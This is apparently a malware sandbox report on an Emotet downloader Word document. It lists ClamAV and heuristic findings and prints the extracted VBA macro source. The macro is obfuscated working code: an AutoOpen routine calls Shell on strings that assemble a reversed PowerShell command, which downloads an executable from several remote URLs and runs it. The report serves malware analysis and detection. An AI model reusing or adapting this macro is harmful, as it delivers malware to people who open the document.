MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6803755-0. It contains a VBA macro with an AutoOpen function, which is a common technique for Emotet to execute malicious code upon opening the document. The macro attempts to execute a command using the Shell function, likely to download and run a secondary payload.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6803755-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6803755-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4929 bytes |
SHA-256: 31ab6c08e98aae75333d40b416fa20cbcc29656c1f51ee2944194c3857877aef |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "RclwCwmuKIfEwp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const oRwvzBo = 0
Dim jAUwE(2)
jAUwE(0) = Right(pUPYusoB, 972)
jAUwE(1) = Left(MadVr, 801)
Dim UfpHFw(5)
UfpHFw(0) = Left(MadVr, 801)
UfpHFw(1) = MidB(SuJNj, 950, 667)
UfpHFw(2) = Left(MadVr, 801)
UfpHFw(3) = Mid(vLDansuW, 768, 765)
UfpHFw(4) = Mid(vLDansuW, 768, 765)
Dim wHFTWH(4)
wHFTWH(0) = MidB(SuJNj, 950, 667)
wHFTWH(1) = Mid(vLDansuW, 768, 765)
wHFTWH(2) = Right(pUPYusoB, 972)
wHFTWH(3) = Right(pUPYusoB, 972)
Dim Zuzbv(5)
Zuzbv(0) = MidB(SuJNj, 950, 667)
Zuzbv(1) = Left(MadVr, 801)
Zuzbv(2) = MidB(SuJNj, 950, 667)
Zuzbv(3) = MidB(SuJNj, 950, 667)
Zuzbv(4) = Right(pUPYusoB, 972)
Dim aHqOi(2)
aHqOi(0) = MidB(SuJNj, 950, 667)
aHqOi(1) = Mid(vLDansuW, 768, 765)
Dim ZbiXH(2)
ZbiXH(0) = MidB(SuJNj, 950, 667)
ZbiXH(1) = Mid(vLDansuW, 768, 765)
Shell@ NtYPrPrKnY + NXBXJQDqJU + khhjDnZiPCiwZ, oRwvzBo
Dim wclQb(3)
wclQb(0) = Right(pUPYusoB, 972)
wclQb(1) = Left(MadVr, 801)
wclQb(2) = Left(MadVr, 801)
Dim HwVKP(5)
HwVKP(0) = Right(pUPYusoB, 972)
HwVKP(1) = Mid(vLDansuW, 768, 765)
HwVKP(2) = MidB(SuJNj, 950, 667)
HwVKP(3) = MidB(SuJNj, 950, 667)
HwVKP(4) = MidB(SuJNj, 950, 667)
Dim XWUzYX(4)
XWUzYX(0) = Mid(vLDansuW, 768, 765)
XWUzYX(1) = Right(pUPYusoB, 972)
XWUzYX(2) = Left(MadVr, 801)
XWUzYX(3) = Right(pUPYusoB, 972)
Dim CTUcFI(2)
CTUcFI(0) = Right(pUPYusoB, 972)
CTUcFI(1) = Mid(vLDansuW, 768, 765)
End Sub
Attribute VB_Name = "CzUVjUoWwTRja"
Function NtYPrPrKnY()
Dim ORaWlL(2)
ORaWlL(0) = MidB(SuJNj, 950, 667)
ORaWlL(1) = Mid(vLDansuW, 768, 765)
Dim SMNDt(5)
SMNDt(0) = MidB(SuJNj, 950, 667)
SMNDt(1) = Mid(vLDansuW, 768, 765)
SMNDt(2) = Left(MadVr, 801)
SMNDt(3) = Mid(vLDansuW, 768, 765)
SMNDt(4) = Right(pUPYusoB, 972)
ljARP = Chr(Format(18 + 14 + 11 + 6 + 50)) + "md /V/" + Chr(Format(12 + 9 + 8 + 4 + 34)) + Chr(Format(5 + 4 + 3 + 2 + 20)) + "^se^t ^Z^F^9" + "=^ ^ ^ ^ ^ ^ ^ ^ ^ " + " ^ ^ }}{h" + Chr(Format(18 + 14 + 11 + 6 + 50)) + "ta" + Chr(Format(18 + 14 + 11 + 6 + 50)) + "};kaer" + "^b;OOE$^ ^met^I^-ekovnI;)O" + "OE$ ^,^w^on^$(el^i^Fd^aolnw^o" + "D.^a" + Chr(Format(12 + 9 + 8 + 4 + 34)) + "O$^{yrt^{)^IE" + "^A^$^ n^i w^on$(^h" + Chr(Format(18 + 14 + 11 + 6 + 50)) + "aero^f^;" + "'^e^x^e^.^" + "'^+jn" + Chr(Format(18 + 14 + 11 + 6 + 50)) + "$^+^'\^'^+" + Chr(Format(18 + 14 + 11 + 6 + 50)) + "i^lb^up^:" + "vn^e^$=O^O^E^"
Dim OihpX(5)
OihpX(0) = MidB(SuJNj, 950, 667)
OihpX(1) = MidB(SuJNj, 950, 667)
OihpX(2) = Right(pUPYusoB, 972)
OihpX(3) = MidB(SuJNj, 950, 667)
OihpX(4) = Left(MadVr, 801)
Dim jMpjlZ(3)
jMpjlZ(0) = Left(MadVr, 801)
jMpjlZ(1) = MidB(SuJNj, 950, 667)
jMpjlZ(2) = Left(MadVr, 801)
rNAOahJtH = "$;'9^5^3' ^=^ jn" + Chr(Format(18 + 14 + 11 + 6 + 50)) + "$^;)'" + "@'(^t^i^l^p^S^.'^Hlg4Y^s" + "SA/^m^o" + Chr(Format(18 + 14 + 11 + 6 + 50)) + "^" + ".^d^bn^oitavon" + "n^i//^:^p^tt^h@i" + Chr(Format(18 + 14 + 11 + 6 + 50)) + "^" + "Z^t0s/^m^o" + Chr(Format(18 + 14 + 11 + 6 + 50)) + "^.^g^e-t^i//:^ptt^" + "h@NKx^xL^G/^m^o" + Chr(Format(18 + 14 + 11 + 6 + 50)) + "^.reg"
Dim hDtid(2)
hDtid(0) = Mid(vLDansuW, 768, 765)
hDtid(1) = Left(MadVr, 801)
Dim MzoWGI(5)
MzoWGI(0) = Mid(vLDansuW, 768, 765)
MzoWGI(1) = Right(pUPYusoB, 972)
MzoWGI(2) = Left(MadVr, 801)
MzoWGI(3) = MidB(SuJNj, 950, 667)
MzoWGI(4) = Mid(vLDansuW, 768, 765)
Dim jJiab(2)
jJiab(0) = Left(MadVr, 801)
jJiab(1) = Mid(vLDansuW, 768, 765)
tXAjbkJCiQS = "gibt" + Chr(Format(18 + 14 + 11 + 6 + 50)) + "a" + "//:pt^t^h^@^" + "O^p^pN^pl/mo" + Chr(Format(18 + 14 + 11 + 6 + 50)) + ".am" + "oh^ab//^:^pt^t^h@T^u/ten^" + ".eenr^e^b//:^p" + "tth^'=^IE^A^$;tne^il" + Chr(Format(12 + 9 + 8 + 4 + 34)) + "^" + "b^eW.t^eN^ ^t" + Chr(Format(18 + 14 + 11 + 6 + 50)) + "e^j^b" + "o-wen=^a" + Chr(Format(12 + 9 + 8 + 4 + 34)) + "O$^ l^l" + "^e^h^sr^e^w^o^p&&
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.